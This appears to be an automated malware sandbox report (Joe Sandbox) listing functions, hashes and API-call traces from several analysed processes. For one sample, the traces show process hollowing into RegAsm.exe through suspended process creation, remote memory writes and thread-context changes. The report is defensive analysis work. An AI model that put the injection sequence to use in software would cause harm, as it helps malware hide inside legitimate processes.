Instruction ID: edffd107ee87f03d4cf4bd4dc01a19a74c069831999b07c7029193f4a7397d60
Opcode Fuzzy Hash: 342254d578ef738c59c8e50f83b448b6328a76d1b86fc517cc899276087a0328
Instruction Fuzzy Hash: FCD0223330042407CE057198F8937E9B34EE78D238F888027C409D7341CC29BE4306D0

Function 025A460F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd563c45a3941f53d6b359ea20ed6a8dd8b1497695ef796a6f254ee280a153c
Instruction ID: 289fd0aaccff0b8364e0d97878f8e71e0b959df79dd468440ae52d21c2047be4
Opcode Fuzzy Hash: bbd563c45a3941f53d6b359ea20ed6a8dd8b1497695ef796a6f254ee280a153c
Instruction Fuzzy Hash: 44D0A772F053444FCF119FB894400DCBF70DE8113071442E3C115C7162C670C855C312

Function 025A1810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e250beb388a12874ee3625440bff7842980777ddf4da80b0e17863f5637263
Instruction ID: f582361a567d24983f6ba1f4deca2309997416339c440c8fb0f58b61335f25fb
Opcode Fuzzy Hash: 99e250beb388a12874ee3625440bff7842980777ddf4da80b0e17863f5637263
Instruction Fuzzy Hash: 3CC080317282110ED72911B439212F977495E9936472D04BFF408C1591D577C4024B88

Function 025A64BE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d24c8ea4b1492a240b4e1320ecaaf3f50d4f4751f396098d80c2f4e20798827
Instruction ID: caa0df3774c72ddad5a74c4ad99a5e4bf28c3ebb6a751558d07ffda07c16a071
Opcode Fuzzy Hash: 6d24c8ea4b1492a240b4e1320ecaaf3f50d4f4751f396098d80c2f4e20798827
Instruction Fuzzy Hash: C3D0A7367401098F8F149BA899004DC7BE0DAC413171441A2C556971A1D764D9518B32

Function 025A34E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 310f01a3108a3720c3dbeaa6bbd59630ee68dcff04a9acf27596c4187e303f98
Instruction ID: e608fe6740f8f06e26f6d472591c9216e5ff2419049f1af5b43d13232f369090
Opcode Fuzzy Hash: 310f01a3108a3720c3dbeaa6bbd59630ee68dcff04a9acf27596c4187e303f98
Instruction Fuzzy Hash: 8DC08C32310028478908B2A8E4228AAB39EEAC9160340806BC90A97341CD227C0247D4

Function 025A1FE0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11e10615eaa269298a8236b29d3a42f58b96170e9dae2024fa9720313729659
Instruction ID: dc1d33c84c20540c73ae830030bc124843914f0127ad98ec6030f9a4cdb65dc6
Opcode Fuzzy Hash: c11e10615eaa269298a8236b29d3a42f58b96170e9dae2024fa9720313729659
Instruction Fuzzy Hash: B1C0923A0002028BCF01CB10FD86B94BBA8EBD1319F58C1A49011CA791CB26EA67CFA1

Function 025A464E Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5efbc1c340b69c1a3d696c20751fbf894614c3f633f0b17b3bcf48017106dff
Instruction ID: a8bbb7b8df5aacc228b9b72cf890516a03d92254a8b4faad069589aacbbc1a40
Opcode Fuzzy Hash: e5efbc1c340b69c1a3d696c20751fbf894614c3f633f0b17b3bcf48017106dff
Instruction Fuzzy Hash: 56B09236A0400889DF008AC8B4823ECF760F780229F100063C31953400827501648681

Function 025A3502 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29c1722958aff4540187ae177f29b421425d4118987e8225e287ee4f0c7bf15
Instruction ID: 8a27e577b934ddc6410005ae2bf29fb5fdf771e20af43f7fad33cf7d2e3c8129
Opcode Fuzzy Hash: e29c1722958aff4540187ae177f29b421425d4118987e8225e287ee4f0c7bf15
Instruction Fuzzy Hash: E3B0122200114103CB035230DA0B3DA2A00DB4233CFDC91EE40418D777CD0ECB82D350

Function 025A2271 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ddca13b07250e2c28b262fdfb90c3f8582f92663e85a1e1ed2cc39f4566fa1
Instruction ID: d16536e3970e97281b80779e5baf549c3a8a9d934df136590f839c231477e27d
Opcode Fuzzy Hash: 26ddca13b07250e2c28b262fdfb90c3f8582f92663e85a1e1ed2cc39f4566fa1
Instruction Fuzzy Hash: 7AC04C769093888FDF536720D8A55547B30BB6330171940D5C145CF1A6C6158C06DF15

Analysis Process: GoogleUpdater.exePID: 7556, Parent PID: 7500COMMON

Executed Functions

Function 00A5064D Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5229c12bc50f8017fd6bab625f4a35c276a21e8c896c4cb5cc6125b82c3cc8db
Instruction ID: 25d710717b9bc598cf89243342093ebb8ff6f53d7d7cf07cc411020d61832b77
Opcode Fuzzy Hash: 5229c12bc50f8017fd6bab625f4a35c276a21e8c896c4cb5cc6125b82c3cc8db
Instruction Fuzzy Hash: C5F05E6190E3C06FD703CB74882059D7F70AF13200B1A01DBE0C4CB263D6254E09C762

Function 00A50B28 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd297cb59ae8085dee1adbee8e2fbc8cc339fb35e15819e0ecd245d14fe8d996
Instruction ID: 40ab3293e23f2180fa1a32b0221a70b30676a6b6064383efa9a23234151cadce
Opcode Fuzzy Hash: fd297cb59ae8085dee1adbee8e2fbc8cc339fb35e15819e0ecd245d14fe8d996
Instruction Fuzzy Hash: 5841A371A007558FDB25CF28D840E9EBBF1FF89341B14465DD896AB3A5DB30A844CB50

Function 00A50DE0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c661f7f74b54a92014ea716020c4ad92d4cbdaf035fc8ac22c759e51059637d
Instruction ID: 7c328d73dcff14201095e2cd2b542b42d52e0cc53861ddf2bf695ec4c490094b
Opcode Fuzzy Hash: 5c661f7f74b54a92014ea716020c4ad92d4cbdaf035fc8ac22c759e51059637d
Instruction Fuzzy Hash: 87219171A047448FDB25DF68C80469EBBF6BF88300F24496DD886EB255DB35AC09CB61

Function 00A50DD0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a67c24291d4db9118b5341e2945da0f46e5f490df960e2c7f4781c33c9b0db9
Instruction ID: 9c2f59d8630a66488b6ef0a934e0ddda1246a7379e893bd4e5bc6fc5a927865b
Opcode Fuzzy Hash: 4a67c24291d4db9118b5341e2945da0f46e5f490df960e2c7f4781c33c9b0db9
Instruction Fuzzy Hash: C421C731A043449FDB15DB78C4146DDBBF2FF89300B144969D886EB365DB35AD09CB61

Function 00A50A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db517364189a7a013195180cc6e047603eaa445d371935eef416cd3c2d09051b
Instruction ID: b05478635a3f232adcc453db449aea529467b5af6f06ff814897018de346edb8
Opcode Fuzzy Hash: db517364189a7a013195180cc6e047603eaa445d371935eef416cd3c2d09051b
Instruction Fuzzy Hash: A61119343109109FC744EB3DD458A1D7BE6FF8DA11B6540A9E506CB775CE71EC018B91

Function 00A50989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d65dbe83a3ba839a172361c26950d664a00264a44787a64622a1980ec55eea
Instruction ID: bc71101df35aca5cb109f1c3793d6c34161c6e9409d32a5406c8d6914d0ef07e
Opcode Fuzzy Hash: b2d65dbe83a3ba839a172361c26950d664a00264a44787a64622a1980ec55eea
Instruction Fuzzy Hash: 401119385545059FCB06EF38EA98948BFB1FF45301B20A6A9D4058733DEB307A59DF40

Function 00A50878 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d3656241b833a937d8dd2859914bfb424753917ee53cc4bcdcd152ea8bbb77b
Instruction ID: 9a04a3806562c64b04486a5ec9cbe48d0c2fc6f70eea9e50873e33d2be74ff71
Opcode Fuzzy Hash: 6d3656241b833a937d8dd2859914bfb424753917ee53cc4bcdcd152ea8bbb77b
Instruction Fuzzy Hash: CA01B132D1474A9BCF019BB9D8005DDFBB6EFCA310F168666E111B71A0EB702589CBA1

Function 008BD049 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4126872818.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8bd000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7649c7c84ea08302ad529c5d0271a050d3079768deb38166b870de6a3a9397
Instruction ID: 9b614cb04a8cb0ced753cad6fe24bbcd3b74b639e8e138685277363bf4f1f816
Opcode Fuzzy Hash: 8d7649c7c84ea08302ad529c5d0271a050d3079768deb38166b870de6a3a9397
Instruction Fuzzy Hash: 4701A771109B44AAE720AA29DD847A7FF98FF51324F18C52AED098E386D279D842C671

Function 00A50998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5582ce2a34afdc4ff9995493d897cc11460efb33a276285f62c18d4611a84f2a
Instruction ID: a1359f6a9b8eac89337666929ac4b8b9bb413d49e08d1ce00d13f14d0d29a0d8
Opcode Fuzzy Hash: 5582ce2a34afdc4ff9995493d897cc11460efb33a276285f62c18d4611a84f2a
Instruction Fuzzy Hash: 8E11E838550506DFCB05FF78EA98949BBB1FB45301B20A668D4059733DEB31BA55DF80

Function 00A50CC1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0100867a8f94dc7eeb95d9bedbd4b68558cbeee60c746014262d9d52a59f69d7
Instruction ID: 8ff8d68a11f2d81c75922b179342e6b567fb043b48a4bc202fd44f65a8e24576
Opcode Fuzzy Hash: 0100867a8f94dc7eeb95d9bedbd4b68558cbeee60c746014262d9d52a59f69d7
Instruction Fuzzy Hash: 9901B532D0464A9BCF01CBB8C8405DDFBB2EFCA300F19876AD11177160E7702599CB91

Function 00A50CD0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f00387598b674abf89a0c9000abf47dd522234f3a83dd86419e4b254d8161be
Instruction ID: e21b0b8557c3f60d8542ca59bd5413167e2a2318d2a1f40b84e3c61232201b69
Opcode Fuzzy Hash: 4f00387598b674abf89a0c9000abf47dd522234f3a83dd86419e4b254d8161be
Instruction Fuzzy Hash: 1B011932D1061A9BCF04DBB9D8444DEFBB6EFCA310F158666D111B71A0EB70259ACBA1

Function 00A50901 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88efbe23b0cc1f6f7bdcead85d8592f5bb53a4dc61ca404863d4d074b617f557
Instruction ID: 5fef636687a7b638a1ba50e29768fed4ece2204e372ecb829c6ab9d5cad62579
Opcode Fuzzy Hash: 88efbe23b0cc1f6f7bdcead85d8592f5bb53a4dc61ca404863d4d074b617f557
Instruction Fuzzy Hash: F8F0F672910209DBDB059B64C8659EFBFB6AF84300F05492AD412BB2A4EE70590ACBD6

Function 00A50D49 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953f23450343a86c1376e0cfed1c85eca59d9fe03462d467cb4db4a63e60aa78
Instruction ID: c3502ff4ec4d83956dd6e21576906112eb74dfd253da787fc596702c01ece90d
Opcode Fuzzy Hash: 953f23450343a86c1376e0cfed1c85eca59d9fe03462d467cb4db4a63e60aa78
Instruction Fuzzy Hash: 9CF02B72A102099BCB18DBA4C955EFFBBF5BF84300F09843ED502AB295DE706505CBD1

Function 008BD048 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4126872818.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8bd000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f43e7a6f962c3e47a20e1135b9989088e113898c479992bf6846f3025a47d99
Instruction ID: 23fa2997f2cef8ee078ea03b07fc818ecfc17cc6e9e3591e0bcc090cd165087a
Opcode Fuzzy Hash: 5f43e7a6f962c3e47a20e1135b9989088e113898c479992bf6846f3025a47d99
Instruction Fuzzy Hash: 3DF06271408744AEE7209A16DC84BA2FFA8FF91734F18C45AED484E286D2799845CAB1

Function 00A50910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a270f8f6660c72f7caf23468149080e3bf90966c775de8b93e105ccff6f89433
Instruction ID: e0c40d576f8008924ad698c94ef54b2300fc7707eef030a9ccbf61700d45347d
Opcode Fuzzy Hash: a270f8f6660c72f7caf23468149080e3bf90966c775de8b93e105ccff6f89433
Instruction Fuzzy Hash: 7BF0E972D1010D97DB04DB64C5559EFBFB66F84300F054926D402B7294DE70590686C1

Function 00A50848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4131443060.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a50000_GoogleUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32b592cc5bb77838938fb38d94cee0e531ffc05bcbc488ae283ded65b0e6404
Instruction ID: 5323375e990076c0f2d34d00faac4f418b9d7dbac2c3f93808a2f6e8a216b0d3
Opcode Fuzzy Hash: f32b592cc5bb77838938fb38d94cee0e531ffc05bcbc488ae283ded65b0e6404
Instruction Fuzzy Hash: F1D017B1905248AFDB15CFA4D815B5D7BB8BB05281F204599E848C7201DA319E50C791

Analysis Process: 596a8ed0706146e48ded9036d0de8611.exePID: 7740, Parent PID: 7500COMMON

Execution Graph

Execution Coverage:	27.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 030D21F9 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,030D216B,030D215B), ref: 030D2368
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030D237B
Wow64GetThreadContext.KERNEL32(000003A4,00000000), ref: 030D2399
ReadProcessMemory.KERNELBASE(000003A8,?,030D21AF,00000004,00000000), ref: 030D23BD
VirtualAllocEx.KERNELBASE(000003A8,?,?,00003000,00000040), ref: 030D23E8
WriteProcessMemory.KERNELBASE(000003A8,00000000,?,?,00000000,?), ref: 030D2440
WriteProcessMemory.KERNELBASE(000003A8,00400000,?,?,00000000,?,00000028), ref: 030D248B
WriteProcessMemory.KERNELBASE(000003A8,-00000008,?,00000004,00000000), ref: 030D24C9
Wow64SetThreadContext.KERNEL32(000003A4,056E0000), ref: 030D2505
ResumeThread.KERNELBASE(000003A4), ref: 030D2514

Strings

ResumeThread, xrefs: 030D2335
GetThreadContext, xrefs: 030D22D3
WriteProcessMemory, xrefs: 030D230C
ress, xrefs: 030D2283
Load, xrefs: 030D2237
GetP, xrefs: 030D227B
VirtualAlloc, xrefs: 030D22C0
ReadProcessMemory, xrefs: 030D22E6
aryA, xrefs: 030D223F
SetThreadContext, xrefs: 030D231F
TerminateProcess, xrefs: 030D23F7
CreateProcessA, xrefs: 030D22AD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 030D2367
VirtualAllocEx, xrefs: 030D22F9

Memory Dump Source

Source File: 00000003.00000002.1764043243.00000000030D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_30d2000_596a8ed0706146e48ded9036d0de8611.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: cd9ad4e909a226b5abe0ea5b5218558a6ba2226fe0aafd5c3acd67e05e4d55fc
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 12B1E67260124AAFDB60CF68CC80BDA77E9FF88714F158564EA0CAB341D774FA518B94

Function 055114D8 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 05511560

Memory Dump Source

Source File: 00000003.00000002.1766087359.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5510000_596a8ed0706146e48ded9036d0de8611.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 592ccf999dcae33b86330cd3b21840bc62639b5fec629d01809bedf50b5b0553
Instruction ID: 566acf41380be513072df08c2abdbdd718f129fe2f193077524eba30c0037cfc
Opcode Fuzzy Hash: 592ccf999dcae33b86330cd3b21840bc62639b5fec629d01809bedf50b5b0553
Instruction Fuzzy Hash: ED21F5B1900249DFDB10DF99D880ADEBBF4FF48310F50842EE559A7250C775A945CFA5

Function 055114E0 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 05511560

Memory Dump Source

Source File: 00000003.00000002.1766087359.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5510000_596a8ed0706146e48ded9036d0de8611.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f668cecea2820eedf149d07e2e4078139f5870e21cea333ab091b438fbe2c64c
Instruction ID: 866e6d758660e2256b8079ad4e345452857351164b8da09c3a3fced0bff384ba
Opcode Fuzzy Hash: f668cecea2820eedf149d07e2e4078139f5870e21cea333ab091b438fbe2c64c
Instruction Fuzzy Hash: D721F0B19002499FCB10DFAAC880ADEFBF4FB48310F50842AE959A7250C775A944CFA5

Function 0158D01D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1763441135.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_158d000_596a8ed0706146e48ded9036d0de8611.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe38a6ac791b4d1e5ed8539a5ea184be20e5e6f0dd0d0b61fcac5445180b2b0
Instruction ID: 13b2fe0c7d983b9cc21a918a4ceb82213d14c321f02a015780196aca686a9f41
Opcode Fuzzy Hash: 3fe38a6ac791b4d1e5ed8539a5ea184be20e5e6f0dd0d0b61fcac5445180b2b0
Instruction Fuzzy Hash: 1001F731008344DAE710AA6ADD8476BBFE8FF413A4F08C529ED085E2C6D27AD842C6B1

Function 0158D006 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1763441135.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_158d000_596a8ed0706146e48ded9036d0de8611.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a11c90d80a74bb2d322c55665cc1c6ac3486967398c37b38f283b3dacf3daaf5
Instruction ID: 72f2ad30d651e4a1b847f914515ffcb17c2643ac9e1786dc741ee19f0a5f8db1
Opcode Fuzzy Hash: a11c90d80a74bb2d322c55665cc1c6ac3486967398c37b38f283b3dacf3daaf5
Instruction Fuzzy Hash: C301296100E3C09FD7128B258C94B56BFB4EF43224F1985DBD9889F1A3D2699849C772

Analysis Process: RegAsm.exePID: 7856, Parent PID: 7740COMMON

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 004CE2E0 Relevance: 75.8, APIs: 16, Strings: 26, Instructions: 2340sleepprocessCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004CE503

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 004CE63D
Sleep.KERNEL32(000000C8,?,?,?), ref: 004CEF31
Sleep.KERNEL32(?), ref: 004CEF5A
GetBinaryTypeA.KERNEL32(00000000,FFFFFFFF), ref: 004CEF84
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004CF440
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004CF451
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004CF45E
GetBinaryTypeA.KERNEL32(?,FFFFFFFF,?), ref: 004CF680
Sleep.KERNEL32(000000C8), ref: 004CF87D
Sleep.KERNEL32(00000000), ref: 004CF8A6
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004CFD69
CloseHandle.KERNEL32(?), ref: 004CFD7A
CloseHandle.KERNEL32(?), ref: 004CFD87
__aulldiv.LIBCMT ref: 004D06D7
ShellExecuteA.SHELL32(00000000,?,?,?,00000000,?), ref: 004D087C

Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F

Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351

Strings

], xrefs: 004D02A6
9, xrefs: 004D02A2
U, xrefs: 004D00A0
+aii, xrefs: 004D0022
<SLYR, xrefs: 004D0804
}{, xrefs: 004CE552
Lb( , xrefs: 004CF6E7
w, xrefs: 004D00A4
%, xrefs: 004CEBE5
;, xrefs: 004CEFD1
F, xrefs: 004CF8C7
^, xrefs: 004CEFD9
eks, xrefs: 004CE748, 004CF09D, 004CF1A9, 004CF53E, 004CF96C, 004CFA78, 004CFE7D, 004CFEC7, 004D0547, 004D0582, 004D0A96, 004D0AE0
^, xrefs: 004CEFE1
n{, xrefs: 004CE5BF
>, xrefs: 004CF8BB
j3l6lrek, xrefs: 004CE7EF, 004CE839, 004CF144, 004CF18E, 004CF250, 004CF29A, 004CF5E5, 004CF62F, 004CFA13, 004CFA5D, 004CFB1F, 004CFB69, 004CFF6E, 004CFFB8, 004D0629, 004D0673, 004D0B87, 004D0BD1
Cao, xrefs: 004D047D
[, xrefs: 004CF8CB
C, xrefs: 004CEFDD
D, xrefs: 004CF2C8
y, xrefs: 004CEBE9
D, xrefs: 004CFB97
